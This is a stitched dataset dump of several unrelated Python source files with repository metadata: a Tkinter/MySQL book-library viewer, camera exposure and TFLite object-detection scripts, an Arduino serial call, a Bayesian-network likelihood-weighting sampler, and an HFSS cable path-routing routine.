self.opt.apply_gradients(zip(grads, self.resnet.trainable_variables))
self.train_loss_metric.update_state(loss)
self.train_acc_metric.update_state(labels, logits)
|
[
"[email protected]"
] | |
c1be505f37b49fa56d97535248dfdf448e20dd52
|
84039fd2f35d5859b7507da6542dd31a51d9e0ed
|
/viewOwnedBooks.py
|
3c2e237530924d33dbea1ab4ed48e4b776e1deef
|
[] |
no_license
|
bri1315/libraryStorage
|
ead12bec708cb0ce6eb9a022d3a4628a96675663
|
19e15ef6f5eaac42550051e84f56ee8e9036471d
|
refs/heads/main
| 2023-02-26T19:01:19.848645 | 2021-02-06T00:55:08 | 2021-02-06T00:55:08 | 336,424,325 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,352 |
py
|
#code coped from my own viewbooks.py code
import tkinter
from tkinter import *
import tkinter.ttk as ttk
from PIL import ImageTk,Image #PIL -> Pillow
import pymysql
#from tkinter import messagebox
con = pymysql.connect(host = "localhost", user = "root", passwd = "####s", database = "books")
mycursor = con.cursor()
#table name and setting it into libraryTable
libraryTable = "library"
def sortByTitle():
try:
mycursor.execute("SELECT title, author, haveIRead, owned, price FROM library WHERE owned = 'yes' ORDER BY title")
#result = mycursor.fetchall()
i = 3
for library in mycursor:
for j in range(len(library)):
populate = Label(root, width = 25, text = library[j], borderwidth=2,relief='ridge', anchor="w", bg = 'pink')
populate.grid(row = i, column = j)
#populate.insert(END, library[j])
i=i+1
except:
messagebox.showinfo("Failed to open database")
def sortByAuthor():
try:
mycursor.execute("SELECT title, author, haveIRead, owned, price FROM library WHERE owned = 'yes' ORDER BY author")
#result = mycursor.fetchall()
i = 3
for library in mycursor:
for j in range(len(library)):
populate = Label(root, width = 25, text = library[j], borderwidth=2,relief='ridge', anchor="w", bg = 'pink')
populate.grid(row = i, column = j)
#populate.insert(END, library[j])
i=i+1
except:
messagebox.showinfo("Failed to open database")
def viewOwnedBooks():
#setting up global variables in order to use them in other functions
global root
#setting the window up
root = tkinter.Tk()
root.title("Viweing My Personal library")
root.geometry("950x405")
root.configure(bg = 'pink')
#setting up the headers and describing what information will be populated
viewTitle = Label(root, text = 'View Books that are owned', fg = "white", bg = 'pink',font = ("Times", 20))
viewTitle.grid(row = 0, column = 1)
titleBtn = Button(root, text = "Sort by Title", bg = 'pink', command = sortByTitle)
titleBtn.grid(row = 0, column = 0)
authorBtn = Button(root, text = "Sort by Author", bg = 'pink', command = sortByAuthor)
authorBtn.grid(row = 0, column = 2)
quit = Button(root, text = "Quit", command = root.destroy)
quit.grid(row = 0, column = 3)
titlePlace = Label(root, width = 25, text = 'Title: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
titlePlace.grid(row = 2, column = 0)
authorPlace = Label(root, width = 25, text = 'Author: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
authorPlace.grid(row = 2, column = 1)
readPlace = Label(root, width = 20, text = 'Read: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
readPlace.grid(row = 2, column = 2)
ownedPlace = Label(root, width = 20, text = 'Owned: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
ownedPlace.grid(row = 2, column = 3)
pricePlace = Label(root, width = 20, text = 'Price: ', anchor="w", bg = 'pink',fg = "white", font = ("Times", 16))
pricePlace.grid(row = 2, column = 4)
root.mainloop()
|
[
"[email protected]"
] | |
d022d56454d570a5b887704c79d4d2843271f345
|
576cc83449e10fd3f98281970c46016ea7a5aea2
|
/OpenCV拟合与特征点识别/模板匹配角度.py
|
78abfbc17a54a507b14bd408976b16d378badf18
|
[] |
no_license
|
HotView/PycharmProjects
|
215ab9edd341e3293daebcf86d97537f8cd28d75
|
61393fe5ba781a8c1216a5cbe7e0d06149a10190
|
refs/heads/master
| 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 171 |
py
|
import math
a = math.atan(2/3)
c = math.atan(1)
print(c*180/math.pi)
print(a*180/math.pi)
#theta1 =math.tanh((a))
#print(theta1)
b = math.atan(6/2)
print(b*180/math.pi)
|
[
"[email protected]"
] | |
0cc2744a4a439488ad0a2d1c8ac0c3dc0fd24949
|
949a41c0e48e8f646fac4c970733a33f5fb920b2
|
/image_capture/exposure-image.py
|
dc0fb62ea7820489752006089d26646ccea178c4
|
[] |
no_license
|
srconstantin/daphnia
|
39f1233e3511bad27aaae8aba25a2be4923be8ca
|
03b43889a083147efa48deea1b88fdcbcd7fa991
|
refs/heads/master
| 2020-04-24T05:26:54.956261 | 2020-01-23T21:27:54 | 2020-01-23T21:27:54 | 171,735,164 | 2 | 1 | null | 2019-04-18T18:57:25 | 2019-02-20T19:23:06 |
C++
|
UTF-8
|
Python
| false | false | 1,081 |
py
|
#!/usr/bin/python3.6
from pypylon import pylon
import sys
import platform
#this is a sample script, that captures a single image with a provided exposure time in the system arguments, and saves it to disk in this file's directory.
if len(sys.argv) < 2:
sys.exit("Must provide exposure time in float as first argument!")
new_exposure = sys.argv[1]
img = pylon.PylonImage()
tlf = pylon.TlFactory.GetInstance()
camera = pylon.InstantCamera(tlf.CreateFirstDevice())
camera.Open()
cur_config = pylon.FeaturePersistence.SaveToString(camera.GetNodeMap())
exposure_idx = cur_config.find("ExposureTime")
print(exposure_idx)
exposure_val = cur_config[exposure_idx+13:exposure_idx+25].partition('\n')[0]
print(exposure_val)
cur_config = cur_config.replace(exposure_val, new_exposure)
pylon.FeaturePersistence.LoadFromString(cur_config, camera.GetNodeMap(), True)
camera.StartGrabbing()
with camera.RetrieveResult(2000) as result:
img.AttachGrabResultBuffer(result)
img.Save(pylon.ImageFileFormat_Png, "expimage.png")
img.Release()
camera.StopGrabbing()
camera.Close()
|
[
"[email protected]"
] | |
969538deb0182c0775bc12ebdc2b35d87705e26b
|
5c4d64d6432328e64d9c2cffcd101b266be37261
|
/Detection/TFLite_detection_image.py
|
f204e169eeb4caf8034f6bcdf33a82376202cdc2
|
[
"MIT"
] |
permissive
|
Final-Six-SIH2020/Detection-and-Classification
|
801e0e23c8d922f1ce54c73a1227ba98eabc7f26
|
d02074fa4e5ba455e011ffd5081cc3428245c4d8
|
refs/heads/master
| 2022-11-26T13:50:31.850632 | 2020-08-01T16:52:00 | 2020-08-01T16:52:00 | 279,120,714 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,720 |
py
|
######## Webcam Object Detection Using Tensorflow-trained Classifier #########
#
# Author: Evan Juras
# Date: 9/28/19
# Description:
# This program uses a TensorFlow Lite object detection model to perform object
# detection on an image or a folder full of images. It draws boxes and scores
# around the objects of interest in each image.
#
# This code is based off the TensorFlow Lite image classification example at:
# https://github.com/tensorflow/tensorflow/blob/master/tensorflow/lite/examples/python/label_image.py
#
# I added my own method of drawing boxes and labels using OpenCV.
# Import packages
from tflite_runtime.interpreter import Interpreter
import tflite_runtime.interpreter as tflite
import os
import argparse
import cv2
import numpy as np
import sys
import glob
# Define and parse input arguments
parser = argparse.ArgumentParser()
parser.add_argument(
"-m", "--modeldir", help="Folder the .tflite file is located in", required=True
)
parser.add_argument(
"-g", "--graph",
help="Name of the .tflite file, if different than detect.tflite",
default="detect.tflite",
)
parser.add_argument(
"-l", "--labels",
help="Name of the labelmap file, if different than labelmap.txt",
default="labelmap.txt",
)
parser.add_argument(
"-t", "--threshold",
help="Minimum confidence threshold for displaying detected objects",
default=0.4,
)
parser.add_argument(
"-i", "--image",
help="Name of the single image to perform detection on. To run detection on multiple images, use --imagedir",
default=None,
)
parser.add_argument(
"-id", "--imagedir",
help="Name of the folder containing images to perform detection on. Folder must contain only images.",
default=None,
)
parser.add_argument(
"-s", "--savedir",
help="Name of the folder to save results",
default=None,
)
parser.add_argument(
"--edgetpu",
help="Use Coral Edge TPU Accelerator to speed up detection",
action="store_true",
)
args = parser.parse_args()
MODEL_NAME = args.modeldir
GRAPH_NAME = args.graph
LABELMAP_NAME = args.labels
min_conf_threshold = float(args.threshold)
use_TPU = args.edgetpu
savedir = args.savedir
# Parse input image name and directory.
IM_NAME = args.image
IM_DIR = args.imagedir
# If both an image AND a folder are specified, throw an error
if IM_NAME and IM_DIR:
print(
'Error! Please only use the --image argument or the --imagedir argument, not both. Issue "python TFLite_detection_image.py -h" for help.'
)
sys.exit()
# If neither an image or a folder are specified, default to using 'test1.jpg' for image name
if not IM_NAME and not IM_DIR:
IM_NAME = "test1.jpg"
if IM_DIR and not savedir:
print(
'Error! Please specify the folder to save detection images in. Issue "python TFLite_detection_image.py -h" for help.'
)
sys.exit()
if savedir:
if not os.path.isdir(savedir):
os.makedirs(savedir)
CWD_PATH = os.getcwd()
# Define path to images and grab all image filenames
if IM_DIR:
PATH_TO_IMAGES = os.path.join(CWD_PATH, IM_DIR)
images = glob.glob(PATH_TO_IMAGES + "\\*.jpg")
elif IM_NAME:
PATH_TO_IMAGES = os.path.join(CWD_PATH, IM_NAME)
images = glob.glob(PATH_TO_IMAGES)
# Path to .tflite file, which contains the model that is used for object detection
PATH_TO_CKPT = os.path.join(CWD_PATH, MODEL_NAME)
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH, LABELMAP_NAME)
# Load the label map
with open(PATH_TO_LABELS, "r") as f:
labels = [line.strip() for line in f.readlines()]
# Have to do a weird fix for label map if using the COCO "starter model" from
# https://www.tensorflow.org/lite/models/object_detection/overview
# First label is '???', which has to be removed.
if labels[0] == "???":
del labels[0]
# Load the Tensorflow Lite model.
interpreter = Interpreter(model_path=PATH_TO_CKPT)
interpreter.allocate_tensors()
# Get model details
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
height = input_details[0]["shape"][1]
width = input_details[0]["shape"][2]
floating_model = input_details[0]["dtype"] == np.float32
input_mean = 127.5
input_std = 127.5
# Loop over every image and perform detection
for image_path in images:
image_name = image_path.split('\\')[-1]
# Load image and resize to expected shape [1xHxWx3]
image = cv2.imread(image_path)
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
imH, imW, _ = image.shape
image_resized = cv2.resize(image_rgb, (width, height))
input_data = np.expand_dims(image_resized, axis=0)
# Normalize pixel values if using a floating model (i.e. if model is non-quantized)
if floating_model:
input_data = (np.float32(input_data) - input_mean) / input_std
# Perform the actual detection by running the model with the image as input
interpreter.tensor(interpreter.get_input_details()[0]["index"])
interpreter.set_tensor(input_details[0]["index"], input_data)
interpreter.invoke()
# Retrieve detection results
boxes = interpreter.get_tensor(output_details[0]["index"])[
0
] # Bounding box coordinates of detected objects
classes = interpreter.get_tensor(output_details[1]["index"])[
0
] # Class index of detected objects
scores = interpreter.get_tensor(output_details[2]["index"])[
0
] # Confidence of detected objects
# Total number of detected objects (inaccurate and not needed)
num = interpreter.get_tensor(output_details[3]['index'])[0]
# Loop over all detections and draw detection box if confidence is above minimum threshold
for i in range(len(scores)):
if (scores[i] > min_conf_threshold) and (scores[i] <= 1.0):
# Get bounding box coordinates and draw box
# Interpreter can return coordinates that are outside of image dimensions, need to force them to be within image using max() and min()
ymin = int(max(1, (boxes[i][0] * imH)))
xmin = int(max(1, (boxes[i][1] * imW)))
ymax = int(min(imH, (boxes[i][2] * imH)))
xmax = int(min(imW, (boxes[i][3] * imW)))
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (10, 255, 0), 2)
# Draw label
object_name = labels[
int(classes[i])
] # Look up object name from "labels" array using class index
label = "%s: %d%%" % (
object_name,
int(scores[i] * 100),
) # Example: 'person: 72%'
labelSize, baseLine = cv2.getTextSize(
label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2
) # Get font size
label_ymin = max(
ymin, labelSize[1] + 10
) # Make sure not to draw label too close to top of window
cv2.rectangle(
image,
(xmin, label_ymin - labelSize[1] - 10),
(xmin + labelSize[0], label_ymin + baseLine - 10),
(255, 255, 255),
cv2.FILLED,
) # Draw white box to put label text in
cv2.putText(
image,
label,
(xmin, label_ymin - 7),
cv2.FONT_HERSHEY_SIMPLEX,
0.7,
(0, 0, 0),
2,
) # Draw label text
# All the results have been drawn on the image, now display the image
cv2.imshow("Object detector", image)
# cv2.imwrite(os.path.join(CWD_PATH, savedir, image_name), image)
# Press any key to continue to next image, or press 'q' to quit
if cv2.waitKey(0) == ord("q"):
break
# Clean up
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
983e0811328b47d5af184f898f004d1f0f7efbca
|
2e9c99f81a2552ebdc1f5ff3931cf92f7c68e6ab
|
/scripts/off.py
|
c238309a30a34e26113b212cce3f3ab2b092c7ad
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
brianma94/RaspiSecureSystem
|
36fb82abb7b5b4bedde41b32e75946ba54c65233
|
b045296a58dcb16c62866ec27fb0181af1c0d9f1
|
refs/heads/master
| 2021-01-12T07:41:02.304873 | 2016-12-20T17:09:42 | 2016-12-20T17:09:42 | 76,997,577 | 0 | 0 | null | 2016-12-20T22:51:09 | 2016-12-20T22:51:09 | null |
UTF-8
|
Python
| false | false | 95 |
py
|
import serial
arduino = serial.Serial('/dev/ttyACM0',9600)
arduino.write('l')
arduino.close()
|
[
"[email protected]"
] | |
c97f7690cd4d98a44770cc65af7e42b9d7a88820
|
79109b9841f0476058899302418803e300ae9687
|
/Artificial_Intelligence/hw3/weighting.py
|
654d38f76a086e412e8ef28d6319ba94bec012e8
|
[] |
no_license
|
GartStav/WPI_projects
|
9894a750e33c5203d342a0b88a967752d63d3262
|
3ce9de7aa8e01579dbd229e12a9ddf7c0ffd5d7c
|
refs/heads/master
| 2020-08-07T12:22:01.034887 | 2015-08-31T03:49:41 | 2015-08-31T03:49:41 | 41,628,095 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,534 |
py
|
#-------------------------------------------------------------------------------
# Performs Likelihood weighting
#
# Author: Artem Gritsenko
# Worcester Polytechnic Intitute, 2013
#-------------------------------------------------------------------------------
import random
def sample(sample_var, bn, CPT, sample_results, evident_var):
parents = []
prob = 0
for i in range(len(bn[sample_var])):
if bn[i][sample_var] == 1:
if sample_results[i] == -1:
print("Error: CPT inconsistences")
else:
parents.append([i, sample_results[i]])
if parents == []:
if evident_var:
table_prob = CPT[sample_var][0][sample_var]
if sample_results[sample_var] == 1:
prob = table_prob
else:
prob = 1 - table_prob
else:
ran_prob = random.uniform(0,1)
if CPT[sample_var][0][sample_var] >= ran_prob:
sample_results[sample_var] = 1
else:
sample_results[sample_var] = 0
else:
for j in range(len(CPT[sample_var])):
found = True
k = 0
while found:
ind = parents[k][0]
if CPT[sample_var][j][ind] == parents[k][1]:
k += 1
else:
found = False
if k > len(parents)-1:
break
if found:
if evident_var:
table_prob = CPT[sample_var][j][sample_var]
if sample_results[sample_var] == 1:
prob = table_prob
else:
prob = 1 - table_prob
else:
ran_prob = random.uniform(0,1)
if CPT[sample_var][j][sample_var] >= ran_prob:
sample_results[sample_var] = 1
else:
sample_results[sample_var] = 0
break
return prob
def sampling(nb, CPT, evidences):
sample_results =[-1, -1, -1, -1]
for j in range(len(evidences)):
ind = evidences[j][0]
sample_results[ind] = evidences[j][1]
w = 1
for i in range(len(nb)):
dont_sample = False
for j in range(len(evidences)):
if evidences[j][0] == i:
dont_sample = True
break
if dont_sample:
w = w * sample(i, nb, CPT, sample_results, True)
else:
sample(i, nb, CPT, sample_results, False)
return [sample_results, w]
def wieghted_sampling(nb, CPT, query, evidences, num_samples):
num_true = 0
num_false = 0
result_true = 0.0
result_false = 0.0
for i in range(int(num_samples)):
[sample, w] = sampling(nb, CPT, evidences)
if sample[query] == 1:
result_true += w
num_true += 1
else:
result_false += w
num_false += 1
res = result_true/(result_true + result_false)
#res = (result_true*num_true + result_false*num_false)/int(num_samples)
return res
def set_the_network():
bn = [[0, 1, 1, 0], [0, 0, 0, 1], [0, 0, 0, 1], [0, 0, 0, 0]]
CPT_C = [[0.5, -1, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]
CPT_S = [[1, 0.1, -1, -1], [0, 0.5, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]
CPT_R = [[1, -1, 0.8, -1], [0, -1, 0.2, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]
CPT_W = [[-1, 1, 1, 0.99], [-1, 1, 0, 0.9], [-1, 0, 1, 0.9], [-1, 0, 0, 0.0]]
CPT = [CPT_C, CPT_S, CPT_R, CPT_W]
return [bn, CPT]
def parse(filename):
infile = open(filename, "r")
variables = infile.readline().strip().split(",")
num_samples = infile.readline()
evidences = []
for i in range(len(variables)):
if variables[i] == 'q':
query = i
if variables[i] == 't':
evidences.append([i, 1])
if variables[i] == 'f':
evidences.append([i, 0])
return [query, evidences, num_samples]
def main():
random.seed()
[nb, CPT] = set_the_network()
[query, evidences, num_samples] = parse("inference.txt")
print("Likelihood weighting")
print(query, evidences, num_samples)
prob = wieghted_sampling(nb, CPT, query, evidences, num_samples)
print(prob)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
19fde128f96d53c76952aab1043ddf4ff57ad868
|
e70ac56109d09a4c323fea4984e2fb29464b0a7f
|
/scripts/test_find_path.py
|
02059ad09220abfcaedc1c1bdb3a075645b1c90f
|
[] |
no_license
|
MatthieuDartiailh/HFSSdrawpy
|
b3542961b564fa3b7721de35f4118d2d78bb87f4
|
9a7e59fc8a90ee5dd85df4319cf6defe108b1904
|
refs/heads/master
| 2020-03-29T09:48:46.196968 | 2018-09-20T15:38:59 | 2018-09-20T15:38:59 | 149,774,962 | 0 | 0 | null | 2018-09-21T14:30:22 | 2018-09-21T14:30:22 | null |
UTF-8
|
Python
| false | false | 29,958 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 23:30:42 2018
@author: checkhov
"""
from scripts.designer import Vector
import matplotlib.pyplot as plt
import matplotlib
import numpy as np
plt.close('all')
def move_figure(f, x, y):
"""Move figure's upper left corner to pixel (x, y)"""
backend = matplotlib.get_backend()
if backend == 'TkAgg':
f.canvas.manager.window.wm_geometry("+%d+%d" % (x, y))
elif backend == 'WXAgg':
f.canvas.manager.window.SetPosition((x, y))
else:
# This works for QT and GTK
# You can also use window.setGeometry
f.canvas.manager.window.move(x, y)
plt.show()
def way(vec):
if vec[1] != 0:
if abs(vec[0]/vec[1])<1e-2:
if vec[1]>0:
return Vector(0,1)
elif vec[1]<0:
return Vector(0,-1)
if vec[0] != 0 :
if abs(vec[1]/vec[0])<1e-2:
if vec[0]>0:
return Vector(1,0)
elif vec[0]<0:
return Vector(-1,0)
def equal_float(float1, float2):
if float1!=0:
rel_diff = abs((float1-float2)/float1)
if rel_diff<1e-5:
return True
else:
return False
elif float2!=0:
rel_diff = abs((float1-float2)/float2)
if rel_diff<1e-5:
return True
else:
return False
else:
return True
iIn_pos = Vector([0,0])
iIn_ori = Vector([0, 1])
iOut_pos = Vector([0, 1])
iOut_ori = Vector([0, -1])
start = [iIn_pos+ iIn_ori.orth()*0.05, iIn_pos- iIn_ori.orth()*0.05]
end = [iOut_pos+ iOut_ori.orth()*0.05, iOut_pos- iOut_ori.orth()*0.05]
class Test(object):
def val(self, nb):
return nb
def find_path(self, fillet, is_meander, to_meander, meander_length):
# iIn_pos = self.pos
# iIn_ori = self.ori
# iOut_pos = self.posOut
# iOut_ori = self.oriOut
# print(val(iIn_pos))
# print(val(iIn_ori))
# print(val(iOut_pos))
# print(val(iOut_ori))
point1 = iIn_pos+iIn_ori*1.1*fillet
point2 = iOut_pos+iOut_ori*1.1*fillet
def next_point(point1, point2, vec):
choice1 = point1+vec*(point2-point1).dot(vec)
choice2 = point1+vec.orth()*(point2-point1).dot(vec.orth())
return [[point1, choice1, point2], [point1, choice2, point2]]
points_choices = []
if iIn_ori.dot(iOut_ori)==-1:
middle_point = (point1 + point2)/2
choice_in = next_point(point1, middle_point, iIn_ori) #bon sens
choice_out = next_point(point2, middle_point, iOut_ori) #à inverser
for c_in in choice_in:
for c_out in choice_out:
points_choices.append([iIn_pos, *c_in, *c_out[:-1][::-1], iOut_pos])
else:
choice_in = next_point(point1, point2, iIn_ori)
for c_in in choice_in:
points_choices.append([iIn_pos, *c_in, iOut_pos])
def cost_f(x):
if x==1:
return 0
elif x==0:
return 1
else:
return 100
def check(points):
print(points)
length = 0
prev_point = points[0]
_points = [points[0]]
vecs = []
for point in points[1:]:
if not equal_float(self.val(point)[0], self.val(prev_point)[0]) or not equal_float(self.val(point)[1], self.val(prev_point)[1]):
vec = self.val(point-prev_point)
print(point, prev_point)
print(vec)
length += self.val(vec).norm()
vecs.append(way(vec))
prev_point = point
_points.append(point)
cost = 0
points = _points.copy()
new_points = [points[0]]
print(vecs)
prev_vec = vecs[0]
for ii, vec in enumerate(vecs[1:]):
curr_vec = vec
if curr_vec.dot(prev_vec)==0:
new_points.append(points[ii+1])
added_cost = cost_f(prev_vec.dot(curr_vec))
cost += added_cost
prev_vec = curr_vec
new_points.append(points[-1])
return cost, new_points, length
final_choice= None
cost=np.inf
for ii, choice in enumerate(points_choices):
new_cost, new_choice, new_length = check(choice)
if new_cost<cost:
final_choice = new_choice
cost = new_cost
length = new_length
length_fillet = length - cost*(2-np.pi/2)*fillet
n_fillet = 10
dist_fillet = length_fillet/n_fillet
float_final_choice = []
for point in final_choice:
float_final_choice.append(self.val(point))
def working_points(points, min_dist, to_meander):
min_dist = min_dist*1.1
working_p_start = []
working_p_end = []
left_p_start=[points[0]]
left_p_end=[points[-1]]
success=False
index_start = 0
for ii, point in enumerate(points[1:]):
A = left_p_start[-1]
B = point
AB = B-A
vec = way(self.val(B-A))
if self.val(AB).norm() > self.val(min_dist):
working_p_start.append(A+vec*min_dist/2)
success = True
index_start = ii+1
break
else:
left_p_start.append(B)
to_meander.pop(0)
if not success:
print('Warning: Could not find points to elongate cable %s' %self.name)
left_p = left_p_start+left_p_end[::-1]
return [], left_p, 0
else:
success=False
index_end = 0
for ii, point in enumerate(points[::-1][1:]):
A = left_p_end[-1]
B = point
AB = B-A
vec = way(self.val(B-A))
if self.val(AB).norm() > self.val(min_dist):
working_p_end.append(A+vec*min_dist/2)
success = True
index_end = ii+1
break
else:
left_p_end.append(B)
to_meander.pop(-1)
if not success:
print('Warning: Could not find points to elongate cable %s' %self.name)
left_p = left_p_start+left_p_end[::-1]
return [], left_p, 0
working_p = working_p_start+points[index_start:-index_end]+working_p_end
index_insertion = len(left_p_start)
left_p = left_p_start+left_p_end[::-1]
return working_p, left_p, index_insertion
def right_left(points):
vecs = []
A = points[0]
for B in points[1:]:
vecs.append(way(self.val(B-A)))
A=B
# print(points)
# print(vecs)
vecA = vecs[0]
r_l = [0]
for vecB in vecs[1:]:
r_l.append(vecA.cross(vecB))
vecA=vecB
r_l.append(0)
return r_l
def add_points(points, rl, min_dist, n_meander):
min_dist = min_dist*1.1
n_points = len(points)
A = points[0]
new_points =[]
if n_points==2:
new_points.append(A)
B=points[-1]
vec = way(self.val(B-A))
AB = (B-A).norm()
n_add = int(self.val(AB/min_dist))
if rl[0]*rl[1]==1 and n_add%2==0:
n_add-=1
if rl[0]*rl[1]==-1 and n_add%2==1:
n_add-=1
if n_meander==-1 or n_meander>=n_add:
dist = AB/n_add
ignore=False
elif n_meander<n_add:
n_add=n_meander
centerAB=(A+B)/2
addedA=centerAB-vec*n_add/2*min_dist
addedB=centerAB+vec*n_add/2*min_dist
dist=min_dist
A=addedA
new_points.append(addedA)
ignore=True
new_points+=[A+vec*dist/2]
new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
rl=None
indices_corners=None
# else:
# indices_corners=[]
# rl = right_left(points)
#
# for ii, B in enumerate(points[1:]):
# new_points.append(A)
# vec = way(self.val(B-A))
# AB = (B-A).norm()
# if ii==0 or ii==n_points-2:
# factor = 0.5
# else:
# factor = 1
# n_add = int(self.val(AB/min_dist)-factor)
# if not(ii==0 or ii==n_points-2):
# if rl[ii-1]*rl[ii]==-1 and n_add%2==1:
# n_add-=1
# if rl[ii-1]*rl[ii]==1 and n_add%2==0:
# n_add-=1
#
# dist = AB/(n_add+factor)
# if n_add>=1:
# if ii==0:
# new_points+=[A+vec*dist/2]
# new_points+=[A+vec*dist*(jj+1+1/2) for jj in range(n_add-1)]
# elif ii!=n_points-2:
# new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
# else:
# new_points+=[A+vec*dist*(jj+1) for jj in range(n_add)]
# indices_corners.append(len(new_points))
# A=B
# indices_corners= indices_corners[:-1]
if ignore:
new_points.append(addedB)
new_points.append(points[-1])
return new_points, indices_corners, dist, ignore
def displace(points, rl, min_dist, displacement=0, n_meander=-1):
if self.val(displacement)<self.val(min_dist)*1.1:
displacement = min_dist*1.1
print(n_meander)
points, indices_corners, dist, ignore = add_points(points, rl, min_dist, n_meander=n_meander)
print(points)
print(dist)
new_points = [points[0]]
parity = 1
if indices_corners is not None:
for ii, B in enumerate(points[1:-1]):
A = points[ii]
AB= B-A
vec = way(self.val(AB))
if ii==0:
parity = (-2*((indices_corners[0]-(ii+1))%2)+1)*(-rl[0])
else:
parity = -parity
if ii+1 not in indices_corners:
#regular point
new_points[ii+1] = points[ii+1]+vec.orth()*parity*min_dist
else:
new_points[ii+1] = points[ii+1]+(vec.orth()*parity+vec).unit()*min_dist
else:
if rl[0]!=0:
parity = -rl[0]
else:
parity = (2*(len(points)%2)-1) * (-rl[1]*(rl[1]+1)+1)
print('rl '+str(-rl[1]*(rl[1]+1)+1))
print(ignore)
if ignore:
n_ignore=2
new_points.append(points[1])
else:
n_ignore=1
for ii, B in enumerate(points[n_ignore:-n_ignore]):
A=points[ii]
AB=B-A
vec=way(self.val(AB))
new_points.append(points[ii+n_ignore]+vec.orth()*parity*displacement-vec*dist/2)
new_points.append(points[ii+n_ignore]+vec.orth()*parity*displacement+vec*dist/2)
parity = -parity
print(points[ii+n_ignore])
if ignore:
new_points.append(points[-2])
new_points.append(points[-1])
return new_points
def meander(points, min_dist, to_meander, meander_length): # to_meander is list of segments to be meander
n_points = len(points)
n_to_meander = len(to_meander)
if n_points-1>n_to_meander:
to_meander = to_meander+[0 for ii in range(n_points-1-n_to_meander)]
else:
to_meander = to_meander[:n_points-1]
working_p, left_p, index_insertion = working_points(points, min_dist, to_meander)
if len(working_p) != 0:
rl = right_left(working_p)
working_ps = []
for ii, isit in enumerate(to_meander):
print(isit)
if isit!=0:
print('calling displace')
new_working_p = displace(working_p[ii:ii+2], rl[ii:ii+2], min_dist, displacement = meander_length, n_meander=isit) # n_meander=-1 -> auto
else:
new_working_p = working_p[ii:ii+2]
working_ps += new_working_p
# print(working_ps)
left_p[index_insertion:index_insertion] = working_ps
return left_p#left_p#,
if is_meander:
min_dist = 2*fillet
final_choice = meander(final_choice, min_dist, to_meander, meander_length)
# Needed to draw Manu bond
def add_fillet_points(points, fillet):
new_points = [points[0]]
for ii, point in enumerate(points[1:-1]):
index = ii+1
p_vec = points[index-1]-point
n_vec = points[index+1]-point
new_points.append(point+way(self.val(p_vec))*fillet)
new_points.append(point+way(self.val(n_vec))*fillet)
new_points.append(points[-1])
return new_points
# new_points = add_fillet_points(final_choice, fillet)
# for ii, point in enumerate(new_points[::2]):
# self.draw('bef_test', [new_points[2*ii], new_points[2*ii+1]], closed=False)
# self.to_bond.append([new_points[2*ii], new_points[2*ii+1]])
# self.draw('test', new_points, closed=False)
# Needed for equidistant fillet
#
#
#
#
def dist(points, A, B, fillet): # A and B are integer point indices
if A<0 or A>=len(points):
raise ValueError('First index should be within the point list')
if B<0 or B>=len(points):
raise ValueError('Second index should be within the point list')
if A==B:
return 0
if abs(A-B)==1:
if A<B:
if A%2==1:
return fillet*np.pi/2
else:
return (points[A]-points[B]).norm()
else:
return dist(points, B, A, fillet)
if abs(A-B)>1:
if A<B:
return dist(points, A, B-1, fillet) + dist(points, B-1, B, fillet)
else:
return dist(points, B, A, fillet)
def where(points, length, fillet):
n_points = len(points)
for ii in range(n_points-1):
distance = dist(points, ii, ii+1, fillet)
if length <= distance:
if ii%2==0:
kind = 'normal'
else:
kind = 'fillet'
return [ii, ii+1], kind, length
else:
length = length-distance
raise ValueError('Length should be smaller than cable length')
def return_bonds(points, fillet, length_fillet, n_fillet): #lengh_fillet is the cable lenght with filleting taken into account
# create bond at half dist_fillet
prev_ori = way(self.val(points[1]-points[0]))
unit_dist_fillet = length_fillet/n_fillet
dist_fillet = unit_dist_fillet/2 #starting dist for the fillet
for ii in range(n_fillet):
indices, kind, remain = where(points, dist_fillet, fillet)
A = points[indices[0]]
B = points[indices[1]]
if kind=='normal':
pos = A + remain*(B-A).unit()
ori = way(self.val(B-A))
width = 0.0004
self.draw_wirebond('wire', pos, ori, width)
prev_ori = ori
else:
next_ori=way(self.val(points[indices[1]+1]-B)) #should be fine, if we have a fillet we have some straight portion after
print(f'kind={kind}')
ex = next_ori
ey = prev_ori
print(f'ex={ex}')
print(f'ey={ey}')
pos_center = A + ex*(B-A).dot(ex)
print(pos_center)
theta = remain/fillet
print(theta*180/np.pi)
pos = pos_center - ex*np.cos(theta)*fillet + ey * np.sin(theta)*fillet
print(f'pos={pos}')
ori = ey*np.cos(theta) + ex*np.sin(theta)
print(f'ori={ori}')
width = 0.0004
self.draw_wirebond('wire', pos, ori, width)
dist_fillet += unit_dist_fillet
_, final_choice, _ = check(final_choice)
to_bond_points = add_fillet_points(final_choice, fillet)
for ii, point in enumerate(to_bond_points[::2]):
# self.draw('bef_test', [to_bond_points[2*ii], to_bond_points[2*ii+1]], closed=False)
# self.to_bond.append([to_bond_points[2*ii], to_bond_points[2*ii+1]])
pass
# to_bond_points= final_choice
return final_choice, to_bond_points
dummy = Test()
